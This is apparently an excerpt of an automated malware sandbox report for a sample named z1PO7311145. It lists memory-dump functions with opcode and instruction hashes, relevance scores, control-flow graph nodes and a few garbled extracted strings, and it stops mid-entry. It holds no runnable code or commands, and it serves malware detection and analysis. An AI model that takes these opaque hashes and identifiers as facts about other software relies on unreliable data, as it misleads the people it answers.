                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 25beaccda00c5f9844c8ca15ea4efacadc36397116eef55dd908b63cf503278f
                                                                                      • Instruction ID: 463aee76304ef29873c3c3f9c4a8547722bf24bf4f0f582e67f54d302c84cd57
                                                                                      • Opcode Fuzzy Hash: 25beaccda00c5f9844c8ca15ea4efacadc36397116eef55dd908b63cf503278f
                                                                                      • Instruction Fuzzy Hash: E1F1D8B4E01228CFDB54DFA9C884B9DBBB2BF88304F5481A9D448AB355EB719D85CF50
                                                                                      Function 06B39BFA Relevance: 1.5, Strings: 1, Instructions: 273COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: K
                                                                                      • API String ID: 0-856455061
                                                                                      • Opcode ID: 742710e087d68c081fa34375977e2d11c4db951187802fa36b2995ed23b98a3c
                                                                                      • Instruction ID: 62e66c6ee4c3c9f926cc7ba469e28d7ac070c76599fe9f07bc9c2a017400082b
                                                                                      • Opcode Fuzzy Hash: 742710e087d68c081fa34375977e2d11c4db951187802fa36b2995ed23b98a3c
                                                                                      • Instruction Fuzzy Hash: BDC14971D056298FDB54DF69C8847DDBBB1FF89300F14D2AAD408AB261EB74AA85CF40
                                                                                      Function 06B30B30 Relevance: .7, Instructions: 709COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 78d6b3205c1b0a04e5ad332198c1f598a93aab2c3aa698f241a7444ff5a9b79a
                                                                                      • Instruction ID: 0a33b90dfd12b95cafc2af8dc9975f3b73c9a44c3686c44cafee8b7f9ae81b16
                                                                                      • Opcode Fuzzy Hash: 78d6b3205c1b0a04e5ad332198c1f598a93aab2c3aa698f241a7444ff5a9b79a
                                                                                      • Instruction Fuzzy Hash: 75729CB4E012288FDB64DF69C990BEDBBB2BB49300F1491E9D409A7355DB34AE81CF50
                                                                                      Function 06B3DE00 Relevance: .3, Instructions: 268COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bd96a604df2f4be67f78741207d1c8e95f649863b61b1202118805fbdbe28889
                                                                                      • Instruction ID: 697cd704500a28ab8646695a6e584637bbf375e503070995fe88de95b11eaff6
                                                                                      • Opcode Fuzzy Hash: bd96a604df2f4be67f78741207d1c8e95f649863b61b1202118805fbdbe28889
                                                                                      • Instruction Fuzzy Hash: 7FC18274E00228CFDB54DFA5C954B9DBBB2BF89300F5081AAD809AB355DB359E85CF50
                                                                                      Function 06B32968 Relevance: .3, Instructions: 268COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 32b76299dee292cc5d7f9a2275f146605aa99fe7e35fd6c29cfb9172d03767e0
                                                                                      • Instruction ID: c9572f6c1382a6274ed606a33c4ffe2ea8f7288d96e406402817927553d86441
                                                                                      • Opcode Fuzzy Hash: 32b76299dee292cc5d7f9a2275f146605aa99fe7e35fd6c29cfb9172d03767e0
                                                                                      • Instruction Fuzzy Hash: C8C19F78E00218CFDB64DFA5C954B9DBBB2BF88300F2091A9D809AB355DB359E85CF50
                                                                                      Function 06B31E80 Relevance: .2, Instructions: 220COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e5b9ef672a53359cee0b2b66a94844b915454c40e86dd6d61b046dc1d01caff
                                                                                      • Instruction ID: 1e19264c4a627c732b037912ba451a02e7ec638452c9eca5d096320e56828948
                                                                                      • Opcode Fuzzy Hash: 0e5b9ef672a53359cee0b2b66a94844b915454c40e86dd6d61b046dc1d01caff
                                                                                      • Instruction Fuzzy Hash: 9EA1A4B5E012288FEB68CF6AC954B9DFBF2BB89300F14D1E9D408A7254DB345A85CF50
                                                                                      Function 06B32DC8 Relevance: .2, Instructions: 220COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7e610737476f2d73c5bd460b1d0e2768bba26443c2892400654337f9cb7ce026
                                                                                      • Instruction ID: cc99b35cc95adc4b06113e1b8f66cf9ca01002fba6f68094875330e06ded5bfb
                                                                                      • Opcode Fuzzy Hash: 7e610737476f2d73c5bd460b1d0e2768bba26443c2892400654337f9cb7ce026
                                                                                      • Instruction Fuzzy Hash: 4AA11674E00218CFEB14DFA9C854B9DBBB1FF88300F209269E409AB391DB759985CF54
                                                                                      Function 06B317A0 Relevance: .2, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2f5290873bde568d08ff7fe91b6e168686c39653606836e31eb97866e112490
                                                                                      • Instruction ID: fcba0f9886514fa9475616b50a169e2e0ed278e597e81782c229d4c5c14ed953
                                                                                      • Opcode Fuzzy Hash: b2f5290873bde568d08ff7fe91b6e168686c39653606836e31eb97866e112490
                                                                                      • Instruction Fuzzy Hash: 5FA193B5E01228CFEB68DF6AC944B9DBBF6BB89300F14D1E9D408A7254DB345A85CF50
                                                                                      Function 06B32DC2 Relevance: .2, Instructions: 218COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e85af7234c82c1afbcdbaaa4ea2a068545ebc96f08cad3c3dad663774fe62b7
                                                                                      • Instruction ID: 8a3d71668f0d152de06959e66fc75e3c4655b84fa5054f27326cbb5973e1a5d6
                                                                                      • Opcode Fuzzy Hash: 3e85af7234c82c1afbcdbaaa4ea2a068545ebc96f08cad3c3dad663774fe62b7
                                                                                      • Instruction Fuzzy Hash: 57A105B4E00218CFEB14DFA9C854B9DBBB1FF88300F209269E409AB395DB759985CF54
                                                                                      Function 06B3310E Relevance: .2, Instructions: 202COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 81f907bf774ebff3b242231a6e25018ab3095818b22910b6928c1226d5c84de8
                                                                                      • Instruction ID: b78fbcc408ecc07cffbc5003b0a363451e644797f184ac4abe038bdee23fa8ec
                                                                                      • Opcode Fuzzy Hash: 81f907bf774ebff3b242231a6e25018ab3095818b22910b6928c1226d5c84de8
                                                                                      • Instruction Fuzzy Hash: B491E4B4E00218CFEB50DFA8C854B9DBBF1FF49310F249299E409AB291DB759985CF54
                                                                                      Function 06B3FC68 Relevance: .2, Instructions: 200COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aa892520bb37472b90818c783dd627951e87d3b0ccfdc4955e13a46e4ad16852
                                                                                      • Instruction ID: 04a8d317446a07286629b60cfeaed4d0a106c2df4fa7a0cacea1c067d27ed2a1
                                                                                      • Opcode Fuzzy Hash: aa892520bb37472b90818c783dd627951e87d3b0ccfdc4955e13a46e4ad16852
                                                                                      • Instruction Fuzzy Hash: E181A474E00218CFDB55EFA9D890BADBBB2FF88300F608169D815AB358EB355946DF50
                                                                                      Function 06B30B20 Relevance: .2, Instructions: 169COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1f5a41e0ec2fd6340c4e3d4813101178547e404013a4f9fb8c437e375c4a35ca
                                                                                      • Instruction ID: cd05da438a634b2157f9df8f1e1210c496f01840424293c82ecb997118946727
                                                                                      • Opcode Fuzzy Hash: 1f5a41e0ec2fd6340c4e3d4813101178547e404013a4f9fb8c437e375c4a35ca
                                                                                      • Instruction Fuzzy Hash: 7B71C375E01228CFDB64DF6AC9807DDBBF2AF89301F1491AAD409A7254DB349A85CF50
                                                                                      Function 06B3178F Relevance: .2, Instructions: 162COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c873a0c0a98f564eaf26a2ee270121ebf22a0bb658b11de985c21f20ef6df2f1
                                                                                      • Instruction ID: 61b49795f6de38455f33d166a038e0f4601929ffa6d7f8543011a76616e8f90b
                                                                                      • Opcode Fuzzy Hash: c873a0c0a98f564eaf26a2ee270121ebf22a0bb658b11de985c21f20ef6df2f1
                                                                                      • Instruction Fuzzy Hash: 447196B5E016288FEB68CF6AC954B9DBBF2BF89300F14C1E9D409A7254DB744A85CF10
                                                                                      Function 02DAE97A Relevance: .1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 009cde0ee7c1101ad6dfa8d02a07fb36963955bf9eb6b524b28445342b250061
                                                                                      • Instruction ID: ee30c8c71317dbc00dc09f0521f166615bde8ac73d3e7af19c054b15e563948f
                                                                                      • Opcode Fuzzy Hash: 009cde0ee7c1101ad6dfa8d02a07fb36963955bf9eb6b524b28445342b250061
                                                                                      • Instruction Fuzzy Hash: 3B519774E00218DFDB19DFA6D894A9DBBB2BF88310F14D129E815AB365DB305842CF54
                                                                                      Function 02DAE988 Relevance: .1, Instructions: 147COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0448c348f1dd487d275fb2e5b9b5a91de652b3a4a7d34beab669f2b2ba007064
                                                                                      • Instruction ID: 4780cec754de87bc17b556cc301c377a046c4427bf1faee00563233b0e8ec6c9
                                                                                      • Opcode Fuzzy Hash: 0448c348f1dd487d275fb2e5b9b5a91de652b3a4a7d34beab669f2b2ba007064
                                                                                      • Instruction Fuzzy Hash: 62518574E00308DFEB18DFAAD494A9DBBB2BF89300F249129E815AB365DB305C42CF54
                                                                                      Function 06B31E70 Relevance: .1, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a434bfcfa58d241e323c7351151f8f33df13017ce74d88274221dee1b0f3e008
                                                                                      • Instruction ID: cb99b916cbca8997f8536ec426042f1ccc9cf3fcdba0c4c37072301b46c745c1
                                                                                      • Opcode Fuzzy Hash: a434bfcfa58d241e323c7351151f8f33df13017ce74d88274221dee1b0f3e008
                                                                                      • Instruction Fuzzy Hash: 114168B1E016188BEB68CF5BC95478EFAF3AFC8300F14C1AAC50CA6254DB750A858F51
                                                                                      Function 06B3295A Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 439356b892f62ada2ba1253e709621caf4d3cbef6ad23817d5d3b29494edd606
                                                                                      • Instruction ID: fa298587ce0ef704aaf9385960f600ff03b581c1e1f3873e52b4a024f5a0e850
                                                                                      • Opcode Fuzzy Hash: 439356b892f62ada2ba1253e709621caf4d3cbef6ad23817d5d3b29494edd606
                                                                                      • Instruction Fuzzy Hash: AA41F5B5E00218CFEB58DFAAD85479EBBF2BF89300F24D169D418AB259DB345945CF40
                                                                                      Function 06B3DDFF Relevance: .1, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 794dec5714715d61517e45451c82d9456f9c546d2a7c752fbbf69fc094ee87b2
                                                                                      • Instruction ID: e5ca4604e93b407c323c0a547fe818c75e623bd4e2c2b8d7ca04dc8db6312b6a
                                                                                      • Opcode Fuzzy Hash: 794dec5714715d61517e45451c82d9456f9c546d2a7c752fbbf69fc094ee87b2
                                                                                      • Instruction Fuzzy Hash: A531D2B5E00218CBEB58DFAAD95079DFBF2AF89300F20D16AC418BB259DB345946CF40
                                                                                      Function 06B3FC5E Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3705579671.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6b30000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 88b618062cf19c810d4b325f17fccbb35a5bc7d0f337f75cde6fb38933491e69
                                                                                      • Instruction ID: 91ac15e77e4ede7e5eede36503ca79937ff6d2699ef323ca30eea1298d5d4cca
                                                                                      • Opcode Fuzzy Hash: 88b618062cf19c810d4b325f17fccbb35a5bc7d0f337f75cde6fb38933491e69
                                                                                      • Instruction Fuzzy Hash: D531D4B4E01218CBDB58DFAAD9546EEBBF2BF89300F50D069D418BB254EB345906CF54
                                                                                      Function 02DA76F1 Relevance: 10.5, Strings: 8, Instructions: 472COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 2da76f1-2da7725 1 2da772b-2da774e 0->1 2 2da7b54-2da7b58 0->2 11 2da77fc-2da7800 1->11 12 2da7754-2da7761 1->12 3 2da7b5a-2da7b6e 2->3 4 2da7b71-2da7b7f 2->4 9 2da7bf0-2da7c05 4->9 10 2da7b81-2da7b96 4->10 18 2da7c0c-2da7c19 9->18 19 2da7c07-2da7c0a 9->19 20 2da7b98-2da7b9b 10->20 21 2da7b9d-2da7baa 10->21 15 2da7848-2da7851 11->15 16 2da7802-2da7810 11->16 25 2da7763-2da776e 12->25 26 2da7770 12->26 22 2da7c67 15->22 23 2da7857-2da7861 15->23 16->15 32 2da7812-2da782d 16->32 27 2da7c1b-2da7c56 18->27 19->27 28 2da7bac-2da7bed 20->28 21->28 33 2da7c6c-2da7c9c 22->33 23->2 29 2da7867-2da7870 23->29 34 2da7772-2da7774 25->34 26->34 76 2da7c5d-2da7c64 27->76 30 2da787f-2da788b 29->30 31 2da7872-2da7877 29->31 30->33 39 2da7891-2da7897 30->39 31->30 59 2da783b 32->59 60 2da782f-2da7839 32->60 61 2da7c9e-2da7cb4 33->61 62 2da7cb5-2da7cbc 33->62 34->11 41 2da777a-2da77dc 34->41 42 2da7b3e-2da7b42 39->42 43 2da789d-2da78ad 39->43 89 2da77de 41->89 90 2da77e2-2da77f9 41->90 42->22 49 2da7b48-2da7b4e 42->49 57 2da78af-2da78bf 43->57 58 2da78c1-2da78c3 43->58 49->2 49->29 63 2da78c6-2da78cc 57->63 58->63 64 2da783d-2da783f 59->64 60->64 63->42 70 2da78d2-2da78e1 63->70 64->15 71 2da7841 64->71 73 2da798f-2da79ba call 2da7538 * 2 70->73 74 2da78e7 70->74 71->15 91 2da79c0-2da79c4 73->91 92 2da7aa4-2da7abe 73->92 78 2da78ea-2da78fb 74->78 78->33 80 2da7901-2da7913 78->80 80->33 81 2da7919-2da7931 80->81 145 2da7933 call 2da80d8 81->145 146 2da7933 call 2da7fe4 81->146 147 2da7933 call 2da7fa4 81->147 148 2da7933 call 2da8055 81->148 85 2da7939-2da7949 85->42 88 2da794f-2da7952 85->88 93 2da795c-2da795f 88->93 94 2da7954-2da795a 88->94 89->90 90->11 91->42 95 2da79ca-2da79ce 91->95 92->2 112 2da7ac4-2da7ac8 92->112 93->22 96 2da7965-2da7968 93->96 94->93 94->96 99 2da79d0-2da79dd 95->99 100 2da79f6-2da79fc 95->100 101 2da796a-2da796e 96->101 102 2da7970-2da7973 96->102 115 2da79df-2da79ea 99->115 116 2da79ec 99->116 104 2da79fe-2da7a02 100->104 105 2da7a37-2da7a3d 100->105 101->102 103 2da7979-2da797d 101->103 102->22 102->103 103->22 110 2da7983-2da7989 103->110 104->105 111 2da7a04-2da7a0d 104->111 107 2da7a49-2da7a4f 105->107 108 2da7a3f-2da7a43 105->108 113 2da7a5b-2da7a5d 107->113 114 2da7a51-2da7a55 107->114 108->76 108->107 110->73 110->78 117 2da7a0f-2da7a14 111->117 118 2da7a1c-2da7a32 111->118 119 2da7aca-2da7ad4 call 2da63e0 112->119 120 2da7b04-2da7b08 112->120 121 2da7a5f-2da7a68 113->121 122 2da7a92-2da7a94 113->122 114->42 114->113 123 2da79ee-2da79f0 115->123 116->123 117->118 118->42 119->120 133 2da7ad6-2da7aeb 119->133 120->76 126 2da7b0e-2da7b12 120->126 129 2da7a6a-2da7a6f 121->129 130 2da7a77-2da7a8d 121->130 122->42 124 2da7a9a-2da7aa1 122->124 123->42 123->100 126->76 131 2da7b18-2da7b25 126->131 129->130 130->42 136 2da7b27-2da7b32 131->136 137 2da7b34 131->137 133->120 142 2da7aed-2da7b02 133->142 139 2da7b36-2da7b38 136->139 137->139 139->42 139->76 142->2 142->120 145->85 146->85 147->85 148->85
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                      • API String ID: 0-2212926057
                                                                                      • Opcode ID: dd1f0dc30e2a42b1a10a7786becbe1fd251f588719859f6a261d61ca5f3909ad
                                                                                      • Instruction ID: 4c8446f22376e3a455ab6e0856290b73cc70bc435838ac5cc8b4521f68d04cd7
                                                                                      • Opcode Fuzzy Hash: dd1f0dc30e2a42b1a10a7786becbe1fd251f588719859f6a261d61ca5f3909ad
                                                                                      • Instruction Fuzzy Hash: 2E123874A002099FEB24CF69D9A4EAEBBF2FF48314F148559E8599B361DB30ED41CB50
                                                                                      Function 02DA6498 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1988 2da6498-2da64a5 1989 2da64ad-2da64af 1988->1989 1990 2da64a7-2da64ab 1988->1990 1991 2da66c0-2da66c7 1989->1991 1990->1989 1992 2da64b4-2da64bf 1990->1992 1993 2da66c8 1992->1993 1994 2da64c5-2da64cc 1992->1994 1997 2da66cd-2da66e0 1993->1997 1995 2da64d2-2da64e1 1994->1995 1996 2da6661-2da6667 1994->1996 1995->1997 1998 2da64e7-2da64f6 1995->1998 1999 2da6669-2da666b 1996->1999 2000 2da666d-2da6671 1996->2000 2009 2da6718-2da671a 1997->2009 2010 2da66e2-2da6705 1997->2010 2006 2da650b-2da650e 1998->2006 2007 2da64f8-2da64fb 1998->2007 1999->1991 2001 2da66be 2000->2001 2002 2da6673-2da6679 2000->2002 2001->1991 2002->1993 2004 2da667b-2da667e 2002->2004 2004->1993 2008 2da6680-2da6695 2004->2008 2011 2da651a-2da6520 2006->2011 2013 2da6510-2da6513 2006->2013 2007->2011 2012 2da64fd-2da6500 2007->2012 2031 2da66b9-2da66bc 2008->2031 2032 2da6697-2da669d 2008->2032 2014 2da672f-2da6736 2009->2014 2015 2da671c-2da672e 2009->2015 2027 2da670e-2da6712 2010->2027 2028 2da6707-2da670c 2010->2028 2022 2da6538-2da6555 2011->2022 2023 2da6522-2da6528 2011->2023 2016 2da6601-2da6607 2012->2016 2017 2da6506 2012->2017 2019 2da6566-2da656c 2013->2019 2020 2da6515 2013->2020 2024 2da6609-2da660f 2016->2024 2025 2da661f-2da6629 2016->2025 2026 2da662c-2da6639 2017->2026 2029 2da656e-2da6574 2019->2029 2030 2da6584-2da6596 2019->2030 2020->2026 2058 2da655e-2da6561 2022->2058 2034 2da652a 2023->2034 2035 2da652c-2da6536 2023->2035 2036 2da6613-2da661d 2024->2036 2037 2da6611 2024->2037 2025->2026 2051 2da663b-2da663f 2026->2051 2052 2da664d-2da664f 2026->2052 2027->2009 2028->2009 2039 2da6578-2da6582 2029->2039 2040 2da6576 2029->2040 2053 2da6598-2da65a4 2030->2053 2054 2da65a6-2da65c9 2030->2054 2031->1991 2041 2da66af-2da66b2 2032->2041 2042 2da669f-2da66ad 2032->2042 2034->2022 2035->2022 2036->2025 2037->2025 2039->2030 2040->2030 2041->1993 2045 2da66b4-2da66b7 2041->2045 2042->1993 2042->2041 2045->2031 2045->2032 2051->2052 2057 2da6641-2da6645 2051->2057 2056 2da6653-2da6656 2052->2056 2063 2da65f1-2da65ff 2053->2063 2054->1993 2066 2da65cf-2da65d2 2054->2066 2056->1993 2060 2da6658-2da665b 2056->2060 2057->1993 2059 2da664b 2057->2059 2058->2026 2059->2056 2060->1995 2060->1996 2063->2026 2066->1993 2067 2da65d8-2da65ea 2066->2067 2067->2063
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,q$,q
                                                                                      • API String ID: 0-1667412543
                                                                                      • Opcode ID: 05d794a4c30fdfc9a33709e1a326829d36b2a8bbef38c3716fefb9e516c3ef64
                                                                                      • Instruction ID: 664cd116c2c9611e0a9f3243b6f2f41944417e1a6080d4b797cb201d9b76da7a
                                                                                      • Opcode Fuzzy Hash: 05d794a4c30fdfc9a33709e1a326829d36b2a8bbef38c3716fefb9e516c3ef64
                                                                                      • Instruction Fuzzy Hash: 10816A34A00505CFCF54DF6DC4A8E6ABBFABF89214B1C81A9D5069B3A4DB31EC41CB91
                                                                                      Function 02DA5F5C Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Hq$Hq
                                                                                      • API String ID: 0-925789375
                                                                                      • Opcode ID: 3b6ff06c5cf2f9137cada6ab82bcb2e2dfd922d8f637ac4230f0820317fb8340
                                                                                      • Instruction ID: f1704346ef637fb639cf2917139d116eacff2dca20961ffa70fcd26c5986cffc
                                                                                      • Opcode Fuzzy Hash: 3b6ff06c5cf2f9137cada6ab82bcb2e2dfd922d8f637ac4230f0820317fb8340
                                                                                      • Instruction Fuzzy Hash: 3851BC31B04211CFDF159F24D865F6EBBAAFB88344F184929E9468B390DB35CC42CB95
                                                                                      Function 02DA9C30 Relevance: 2.6, Strings: 2, Instructions: 150COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'q$4'q
                                                                                      • API String ID: 0-1467158625
                                                                                      • Opcode ID: 7e0e6e800344fba509be39d9c4a4a9d0531478a01d8f211245ec4fe0c9fa8bb6
                                                                                      • Instruction ID: 6b68643783167ce3db270ae825fb25a15a526ab11f316a0c3f32bee758227971
                                                                                      • Opcode Fuzzy Hash: 7e0e6e800344fba509be39d9c4a4a9d0531478a01d8f211245ec4fe0c9fa8bb6
                                                                                      • Instruction Fuzzy Hash: 57519C347003199FDB00DB69C864BAABBEAEF88314F148465E908CB351DB75DC42CBA1
                                                                                      Function 02DA3CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3696306755.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2da0000_z1PO7311145.jbxd
                                                                                      Similarity
                                                                                      • API ID:
